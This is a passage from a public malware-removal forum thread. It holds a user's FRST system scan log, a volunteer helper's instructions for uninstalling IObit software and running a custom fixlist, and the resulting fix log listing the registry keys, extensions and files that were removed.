2014-09-16 13:51 - 2014-09-16 13:51 - 01387880 _____ () C:\Users\John\AppData\Local\DIRECTV Player\NDSPCShowServer.exe
2015-01-02 11:06 - 2013-10-25 12:08 - 00517408 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\sqlite3.dll
2014-04-23 22:05 - 2014-06-04 15:17 - 00892288 _____ () C:\Program Files (x86)\IObit\Smart Defrag 3\webres.dll
2014-01-15 18:13 - 2009-03-12 15:45 - 00135168 ____N () C:\Program Files (x86)\Epson Software\Event Manager\Assistants\Scan Assistant\ScanEngine.dll
2014-01-15 18:13 - 2008-11-21 13:58 - 00057344 ____N () C:\Program Files (x86)\Epson Software\Event Manager\Assistants\Scan Assistant\Satwain.dll
2014-07-17 19:20 - 2013-01-15 18:48 - 00348992 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madExcept_.bpl
2014-07-17 19:20 - 2013-01-15 18:48 - 00183616 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madBasic_.bpl
2014-07-17 19:20 - 2013-01-15 18:48 - 00051008 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\madDisAsm_.bpl
2014-07-17 19:20 - 2013-12-12 18:46 - 08001344 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\WebUI.dll
2014-07-17 19:20 - 2013-05-16 19:26 - 00182080 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\unrar.dll
2014-07-17 19:20 - 2013-10-16 22:17 - 00185168 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\libcurl-4.dll
2014-07-17 19:20 - 2013-05-16 19:26 - 00145216 _____ () C:\Program Files (x86)\IObit\IObit Malware Fighter\zlibwapi.dll
2015-01-02 11:06 - 2013-01-15 18:47 - 00893248 _____ () C:\Program Files (x86)\IObit\Advanced SystemCare 8\webres.dll
2014-11-24 11:39 - 2014-11-24 11:39 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2013-11-24 01:14 - 2013-06-01 06:31 - 01199576 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2013-11-24 01:27 - 2013-05-02 16:01 - 01813792 _____ () C:\Program Files (x86)\Dell Backup and Recovery\OLCoreWrapper.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 11475296 _____ () C:\Users\John\AppData\Local\DIRECTV Player\PCShowServer.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 02948448 _____ () C:\Users\John\AppData\Local\DIRECTV Player\DrmSingleton.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00339296 _____ () C:\Users\John\AppData\Local\DIRECTV Player\ndsLogStore.dll
2014-09-16 13:51 - 2014-09-16 13:51 - 02106728 _____ () C:\Users\John\AppData\Local\DIRECTV Player\DiscoveryManager.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00689000 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstreamer-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 01403224 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libxml2-2.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00091976 _____ () C:\Users\John\AppData\Local\DIRECTV Player\z.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00205672 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstbase-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00060272 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstinterfaces-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00043880 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstvideo-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 00044896 _____ () C:\Users\John\AppData\Local\DIRECTV Player\libgstapp-0.10.dll
2014-09-16 13:52 - 2014-09-16 13:52 - 08296288 _____ () C:\Users\John\AppData\Local\DIRECTV Player\gsttspplugin.dll
2014-12-29 17:34 - 2014-11-26 10:40 - 03758192 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-1973512931-3336358897-1288466322-500 - Administrator - Disabled)
Guest (S-1-5-21-1973512931-3336358897-1288466322-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1973512931-3336358897-1288466322-1002 - Limited - Enabled)
John (S-1-5-21-1973512931-3336358897-1288466322-1001 - Administrator - Enabled) => C:\Users\John

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/05/2015 11:45:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/05/2015 11:43:12 AM) (Source: AdvancedSystemCareService8) (EventID: 0) (User: )
Description: The handle is invalid

Error: (01/05/2015 11:43:12 AM) (Source: AdvancedSystemCareService8) (EventID: 0) (User: )
Description: The handle is invalid

Error: (01/05/2015 11:19:30 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 34.0.5.5443 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1570

Start Time: 01d0290b336c38da

Termination Time: 28

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: fd3ac2d3-94fe-11e4-bd22-645a04abf913

Error: (01/05/2015 10:48:45 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/29/2014 05:26:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/28/2014 01:48:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/28/2014 01:42:41 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/27/2014 09:07:24 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/26/2014 11:40:37 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/05/2015 11:45:02 AM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/05/2015 11:45:02 AM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716} because another computer on the network has the same name.  The server could not start.

Error: (01/05/2015 10:47:58 AM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/05/2015 10:47:58 AM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716} because another computer on the network has the same name.  The server could not start.

Error: (01/04/2015 03:57:04 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/04/2015 03:57:04 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :0" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/04/2015 03:57:04 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{0FE2EC0A-CBB7-4679-9CDB-F2977D6F1716} because another computer on the network has the same name.  The server could not start.

Error: (01/04/2015 01:36:32 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :0" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/04/2015 01:36:32 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :0" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.

Error: (01/04/2015 01:36:31 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "JOHN-PC        :20" could not be registered on the interface with IP address 192.168.0.10.
The computer with the IP address 192.168.0.3 did not allow the name to be claimed by
this computer.


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core™ i5-4200U CPU @ 1.60GHz
Percentage of memory in use: 36%
Total physical RAM: 6032.36 MB
Available physical RAM: 3841.55 MB
Total Pagefile: 12062.9 MB
Available Pagefile: 9524 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:444.06 GB) (Free:371.99 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:21.67 GB) (Free:11.61 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: B797F90B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=21.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=444.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 

 

 

 

 

 

 

 

 


  • 0

#8
Nevan

Nevan

    Trusted Helper

  • Malware Removal
  • 1,765 posts

Hello, snoopdog1951.

The IOBit software you have isn't an antivirus and this IOBit system maintenance software doesn't have a good reputation. Its technically not a virus, but it does exhibit plenty of malicious traits, such as rootkit capabilities to hook deep into the operating system, browser hijacking, and in general just interfering with the user experience. The industry generally refers to it as a PUP, or potentially unwanted program.
In the past, free IOBit software would find things, malicious or not, and then charge the customer to remove them.
I'll instruct you how to remove it's software and we'll install a real antivirus program on your computer later. Please refrain from surfing the internet, except to come here, until we get some antivirus protection on your computer.

 
Step #1
Uninstall programs

Go to Start Menu>Control Panel>Programs>Uninstall a program (or Control Panel>Programs and Features if using icon view). A list of installed programs will appear.
Right click on the following programs and then click Uninstall:

NOTE: Some uninstallers will present a confusing message that might ask you to keep a slimmed down or different version. Or try to trick you or scare you into keeping the program installed. If you don't understand any message you get please stop, copy the message exactly and come back here and ask.

  • Advanced SystemCare 8
  • Coupon Printer for Windows
  • Driver Booster 2
  • IObit Apps Toolbar v10.5
  • IObit Malware Fighter
  • IObit Uninstaller
  • Smart Defrag 3
  • Surfing Protection

 
Step #2
FRST Fix

  • Download attached fixlist.txt file to your desktop.
    Attached File  fixlist.txt   8.75KB   258 downloads
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Right click FRST64.exe on your desktop and click Run as administrator. When the tool opens click Yes to disclaimer.
  • Press the Fix button just once and wait.
    NOTE: It's important that both FRST64.exe and fixlist.txt are in the same location or the fix will not work.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished, FRST will generate a log on the desktop (Fixlog.txt). Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.

 
Things that should appear in your next post:

  • Fixlog.txt log content
  • Please tell me if you still have any problems with your computer

  • 0

#9
snoopdog1951

snoopdog1951

    Member

  • Topic Starter
  • Member
  • PipPip
  • 17 posts

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 07-01-2015
Ran by John at 2015-01-08 23:33:17 Run:1
Running from C:\Users\John\Desktop
Loaded Profile: John (Available profiles: John)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {843F8246-B4D3-436E-993C-E683694E7048} URL = http://start.mysearc...cr=20185727&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {843F8246-B4D3-436E-993C-E683694E7048} URL = http://start.mysearc...cr=20185727&ir=
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {843F8246-B4D3-436E-993C-E683694E7048} URL
FF user.js: detected! => C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\user.js
FF Extension: YoutuubeAdBllooCke - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2014-12-16]
CHR Extension: (BuyNSAve) - C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib\ [2014-11-04]
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [179184 2014-10-15] (Coupons.com Inc.)
C:\Program Files (x86)\Coupons
Task: {07A2F53B-4786-4062-A24F-C16B7B8626FE} - \Digital Sites No Task File <==== ATTENTION
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1802048 2014-10-13] (IObit)
HKU\S-1-5-18\...\Run: [Advanced SystemCare 8] => C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCTray.exe [2427680 2014-12-10] (IObit)
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> E2170BFC38574C29915A1E2A25F2714A URL = http://securedsearch...q={searchTerms}
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll (IObit)
BHO-x32: Ads Removal -> {9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} -> C:\Program Files (x86)\IObit\IObit Malware Fighter\adsremoval\IE\Adblock.dll (Adblock)
BHO-x32: Advanced SystemCare Surfing Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files (x86)\IObit\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll (IObit)
FF NewTab: hxxp://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10088_cnet_141226
FF SelectedSearchEngine: Ad-Aware SecureSearch
FF SearchPlugin: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\searchplugins\securesearch.xml
FF Extension: Ads Removal - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2014-12-14]
FF Extension: Advanced SystemCare Surfing Protection - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2015-01-02]
CHR Extension: (Advanced SystemCare Surfing Protection) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd [2014-04-09]
CHR HKLM-x32\...\Chrome\Extension: [nfengeggddojhakldhlpjdlddgkkjkdd] - C:\Program Files (x86)\IObit\Surfing Protection\BrowerProtect\ASC_GhromePlugin.crx [2014-01-13]
R2 AdvancedSystemCareService8; C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe [815392 2014-11-04] (IObit)
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [344896 2014-09-30] (IObit)
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2631456 2015-01-02] (IObit)
R3 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34848 2013-11-19] (IObit.com)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [21184 2014-06-04] (IObit)
R3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\UrlFilter.sys [23016 2013-11-19] (IObit.com)
2015-01-02 11:08 - 2015-01-02 11:08 - 00002852 _____ () C:\Windows\System32\Tasks\ASC8_SkipUac_John
2015-01-02 11:07 - 2015-01-02 11:07 - 00002892 _____ () C:\Windows\System32\Tasks\Uninstaller_SkipUac_John
2015-01-02 11:07 - 2015-01-02 11:07 - 00000000 ____D () C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0}
2015-01-02 11:06 - 2015-01-02 11:14 - 00002111 _____ () C:\Users\Public\Desktop\Advanced SystemCare 8.lnk
2015-01-02 11:06 - 2015-01-02 11:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare 8
2014-12-11 22:07 - 2014-12-17 20:11 - 00000000 ____D () C:\Program Files (x86)\Application Updater
2014-12-11 22:07 - 2014-12-17 20:10 - 00000000 ____D () C:\Program Files (x86)\IObit Apps Toolbar
2014-12-09 22:06 - 2014-12-09 22:06 - 00001179 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-12-09 22:06 - 2014-12-09 22:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-12-09 22:04 - 2014-12-09 22:05 - 32809520 _____ (IObit ) C:\Users\John\Downloads\IObit-Malware-Fighter-Setup.exe
2015-01-02 11:08 - 2014-01-13 16:39 - 00000000 ____D () C:\ProgramData\ProductData
2015-01-02 11:08 - 2014-01-13 16:37 - 00000000 ____D () C:\Users\John\AppData\Roaming\IObit
2015-01-02 11:07 - 2014-01-13 16:35 - 00000000 ____D () C:\ProgramData\IObit
2015-01-02 11:06 - 2014-01-13 16:35 - 00000000 ____D () C:\Program Files (x86)\IObit
Task: {15BF610A-6047-49D5-93A5-4DEBE157F84D} - System32\Tasks\Driver Booster SkipUAC (SYSTEM) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2014-10-28] (IObit)
Task: {73F1ECDA-E878-4546-961F-1A64753EA16E} - System32\Tasks\SmartDefrag3_Startup => C:\Program Files (x86)\IObit\Smart Defrag 3\SmartDefrag.exe [2014-11-04] (IObit)
Task: {890EE660-61F4-4441-A4B3-66BE385978EB} - System32\Tasks\ASC8_SkipUac_John => C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASC.exe [2014-12-10] (IObit)
Task: {BA55BC07-9D8B-4B05-84F9-3DEA9F26C048} - System32\Tasks\Driver Booster SkipUAC (John) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2014-10-28] (IObit)
Task: {C190163D-888F-4F09-BEA5-EB4E6D0D0C36} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe [2014-10-13] (IObit)
Task: {CAE18874-F60E-4A7F-851F-69D0DD6D6E70} - System32\Tasks\Uninstaller_SkipUac_Administrator => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-01-02] (IObit)
Task: {CE90F2B6-3A0E-48C7-9779-C70824FB3438} - System32\Tasks\SmartDefrag3_Update => C:\Program Files (x86)\IObit\Smart Defrag 3\AutoUpdate.exe [2014-07-23] (IObit)
Task: {F28CB2D1-C20D-4E37-8E15-10F216172851} - System32\Tasks\Uninstaller_SkipUac_John => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-01-02] (IObit)
2014-12-26 12:14 - 2014-12-26 12:14 - 00000000 ____D () C:\Users\John\AppData\Roaming\LavasoftStatistics
2014-12-26 12:13 - 2014-12-26 12:13 - 00004720 _____ () C:\Windows\SysWOW64\LavasoftTcpService.ini
2014-12-26 12:13 - 2014-12-26 12:13 - 00002552 _____ () C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
2014-12-26 12:13 - 2014-12-26 12:13 - 00002552 _____ () C:\Windows\system32\LavasoftTcpServiceOff.ini
2014-12-26 12:13 - 2014-12-16 12:10 - 00358736 _____ (Lavasoft Limited) C:\Windows\system32\LavasoftTcpService64.dll
2014-12-26 12:13 - 2014-12-16 12:10 - 00312424 _____ (Lavasoft Limited) C:\Windows\SysWOW64\LavasoftTcpService.dll
2014-12-26 12:08 - 2014-12-26 12:08 - 01924232 _____ () C:\Users\John\Downloads\Adaware_Installer.exe
2014-12-26 15:08 - 2014-12-26 15:08 - 02077392 _____ (Microsoft Corporation) C:\Users\John\Downloads\7A2E.tmp
2014-12-26 10:53 - 2014-12-26 10:53 - 00003164 _____ () C:\Windows\System32\Tasks\SmartDefrag3_Startup
2014-12-26 10:53 - 2014-12-26 10:53 - 00003162 _____ () C:\Windows\System32\Tasks\SmartDefrag3_Update
2014-12-26 10:52 - 2014-12-26 10:52 - 00003156 _____ () C:\Windows\System32\Tasks\Driver Booster Update
2014-12-26 10:52 - 2014-12-26 10:52 - 00000000 ____D () C:\Windows\Tasks\ImCleanDisabled
2014-12-26 10:52 - 2014-12-26 10:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 2
2014-12-16 12:13 - 2014-12-26 11:27 - 00000000 ____D () C:\Program Files (x86)\YoutuubeAdBllooCke
2014-12-16 12:13 - 2014-12-26 11:27 - 00000000 ____D () C:\Program Files (x86)\Free Visio Viewer
2014-12-16 12:12 - 2014-12-16 12:12 - 00000000 ____D () C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib
2014-12-16 12:12 - 2014-12-16 12:12 - 00000000 ____D () C:\ProgramData\15431041915562449580
2014-12-09 22:04 - 2014-12-09 22:05 - 32809520 _____ (IObit ) C:\Users\John\Downloads\IObit-Malware-Fighter-Setup.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{843F8246-B4D3-436E-993C-E683694E7048}" => Key deleted successfully.
HKCR\CLSID\{843F8246-B4D3-436E-993C-E683694E7048} => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Key not found.
HKU\S-1-5-21-1973512931-3336358897-1288466322-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {843F8246-B4D3-436E-993C-E683694E7048} URL => Value not found.
C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\user.js => Moved successfully.
C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] => Moved successfully.
C:\ProgramData\lbihihaaofomgcababbmjgbblobipmib\ => Moved successfully.
CouponPrinterService => Service not found.
"C:\Program Files (x86)\Coupons" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{07A2F53B-4786-4062-A24F-C16B7B8626FE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07A2F53B-4786-4062-A24F-C16B7B8626FE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Digital Sites" => Key deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\IObit Malware Fighter => Value not found.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Advanced SystemCare 8 => value deleted successfully.
"HKU\S-1-5-21-1973512931-3336358897-1288466322-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\E2170BFC38574C29915A1E2A25F2714A" => Key deleted successfully.
HKCR\CLSID\E2170BFC38574C29915A1E2A25F2714A => Key not found.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814} => Key not found.
HKCR\CLSID\{10921475-03CE-4E04-90CE-E2E7EF20C814} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} => Key not found.
HKCR\Wow6432Node\CLSID\{9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} => Key not found.
HKCR\Wow6432Node\CLSID\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} => Key not found.
Firefox newtab deleted successfully.
Firefox SelectedSearchEngine deleted successfully.
C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\searchplugins\securesearch.xml => Moved successfully.
C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] => Moved successfully.
C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] not found.
C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd => Moved successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd" => Key deleted successfully.
"C:\Program Files (x86)\IObit\Surfing Protection\BrowerProtect\ASC_GhromePlugin.crx" => File/Directory not found.
AdvancedSystemCareService8 => Service not found.
IMFservice => Service not found.
LiveUpdateSvc => Service not found.
FileMonitor => Service not found.
RegFilter => Service not found.
SmartDefragDriver => Service not found.
UrlFilter => Service not found.
"C:\Windows\System32\Tasks\ASC8_SkipUac_John" => File/Directory not found.
"C:\Windows\System32\Tasks\Uninstaller_SkipUac_John" => File/Directory not found.
C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} => Moved successfully.
"C:\Users\Public\Desktop\Advanced SystemCare 8.lnk" => File/Directory not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare 8" => File/Directory not found.
C:\Program Files (x86)\Application Updater => Moved successfully.
"C:\Program Files (x86)\IObit Apps Toolbar" => File/Directory not found.
"C:\Users\Public\Desktop\IObit Malware Fighter.lnk" => File/Directory not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter" => File/Directory not found.
C:\Users\John\Downloads\IObit-Malware-Fighter-Setup.exe => Moved successfully.
C:\ProgramData\ProductData => Moved successfully.
C:\Users\John\AppData\Roaming\IObit => Moved successfully.
C:\ProgramData\IObit => Moved successfully.
C:\Program Files (x86)\IObit => Moved successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{15BF610A-6047-49D5-93A5-4DEBE157F84D} => Key not found.
C:\Windows\System32\Tasks\Driver Booster SkipUAC (SYSTEM) not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster SkipUAC (SYSTEM) => Key not found.
